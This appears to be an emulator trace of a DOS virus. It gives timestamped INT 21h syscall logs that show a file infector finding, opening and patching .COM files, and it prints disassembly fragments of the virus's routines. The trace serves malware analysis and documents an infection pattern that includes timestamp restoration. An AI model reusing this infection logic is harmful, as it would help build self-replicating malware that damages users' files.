2018-12-25T11:43:09.830687739Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:09.832694303Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:09.84929109Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.857234593Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:09.860238627Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:09.86167414Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:09.865220147Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:09.874535137Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:09.876247294Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:09.886053135Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.89797063Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.901043261Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.909644349Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.917257689Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.919293635Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.930752117Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.938650944Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.941730052Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.943463255Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.9463993Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.956012741Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.95777697Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.967797382Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.978693215Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.981775294Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.990561526Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.997602876Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.9995185Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.011579306Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.025411356Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:10.032619138Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:10.034396504Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:10.037527511Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:10.048483336Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:10.050444343Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:10.059205147Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.070823325Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.074184657Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.091036707Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.098711988Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.100916181Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.112301895Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.119598397Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:10.12257922Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:10.12477219Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:10.127719218Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:10.136804366Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:10.13933568Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:10.14774783Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.158843362Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.163156471Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.171012857Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.178180827Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.181065808Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.186765096Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.192738162Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:10.196273155Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:10.198971356Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:10.201651533Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:10.219369018Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:10.223213709Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:10.226054855Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.230996402Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.234586629Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.241697461Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.248500416Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.251064961Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.262445668Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.270217329Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:10.273714184Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:10.275912031Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:10.278898618Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:10.289106538Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:10.29190703Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:10.300544277Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.311226161Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.314972605Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.322312714Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.329478815Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.334457944Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.346077544Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.359276557Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:10.367642602Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:10.369802062Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:10.372938338Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:10.382322242Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:10.385082599Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:10.393671511Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:10.404951257Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.409449514Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:10.417662982Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:10.42544693Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:10.428536873Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:10.431236643Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:10.435847526Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:10.439544793Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:10.440829648Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:10.442771358Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:12.261714414Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:12.267285576Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:12.268639536Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.269779501Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.272571168Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:12.275340984Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:12.28630499Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:12.29529381Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:12.301742441Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:12.303732278Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:12.319546558Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.326164324Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:12.328836658Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:12.330482762Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:12.333898656Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:12.342126636Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:12.343872257Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:12.352134691Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.369643044Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.372263524Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.379404381Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.385601044Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.387238837Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.401372211Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.407945576Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.410831468Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.41283039Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.415704197Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.424433871Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.427027256Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.434972244Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.445453217Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.448338196Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.452954416Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.457624064Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.459141935Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.467053731Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.478402825Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.484757094Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.486902927Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.489324296Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.497403251Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.499942021Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.507471625Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.517754093Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.521305672Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.528415985Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.535371187Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.538293411Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.547880598Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.555252663Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.558833836Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.560231052Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.562857293Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.777741909Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.778864037Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.914218846Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.93269299Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.935630944Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.942558845Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.949530659Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.951235365Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.956321961Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.962276181Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.96532143Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.967033206Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.970863243Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.987478134Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.989191918Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.991713263Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.996228857Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.999359766Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.006690994Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.014931006Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.017934279Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.028688983Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.036452462Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.039888646Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.042573107Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.045135292Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.055339893Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.057015046Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.288125634Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.376690268Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.382343209Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.393140822Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.399313054Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.401402498Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.411790904Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.418361119Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.421380689Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.423708238Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.426412358Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.727355798Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.735557521Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.743420771Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.753426212Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.757535495Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.764263009Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.770471092Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.773429042Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.776526851Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:13.780870296Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:13.78455672Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:13.786303661Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:13.788347487Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:12.276512102Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:12.28071473Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:12.281750034Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.282809225Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:12.285174646Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:12.288020089Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:12.2985064Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:12.313257205Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:12.319821243Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:12.321655607Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:12.337513042Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.345341054Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:12.349749485Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:12.351474011Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:12.355138463Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:12.364475027Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:12.366824024Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:12.376899889Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.390560043Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.393254928Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.4001071Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.406473322Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.407719327Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.41795342Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.42217343Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.424291573Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.425633719Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.427588224Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.432869498Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.434199659Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.439688896Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.458058711Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.470909693Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.478403511Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.494099176Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.495968493Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.50773335Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.515825528Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.518786391Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.521029848Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.524244456Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.533562242Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.535997372Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.544675372Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.55501024Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.559212517Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.566052089Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.573072589Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.57613404Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.812333979Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.818847301Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.821292459Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.822302915Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.824669609Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:12.913557683Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:12.920721632Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:12.928526907Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.93936481Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:12.942847283Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.950202294Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:12.956723603Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:12.960390382Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:12.965782929Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:12.971076426Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:12.975162797Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:12.986219891Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:12.989639642Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.00788136Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.009362696Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.011049851Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.016584991Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.019698011Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.026227333Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.032762725Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.034779794Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.046139312Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.053900111Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.057356912Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.060048515Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.068631918Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.288720994Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.290513701Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.374439339Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.394659264Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.397594647Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.406325155Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.412808552Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.415965034Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.727431203Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.737128294Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:13.740281609Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:13.742910673Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:13.745440393Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:13.755262908Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:13.75687308Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:13.767473834Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:13.778681389Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.781696423Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:13.79029331Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:13.797268761Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:13.798913499Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:13.802193717Z	59	PC: 12a99 \| Change current directory
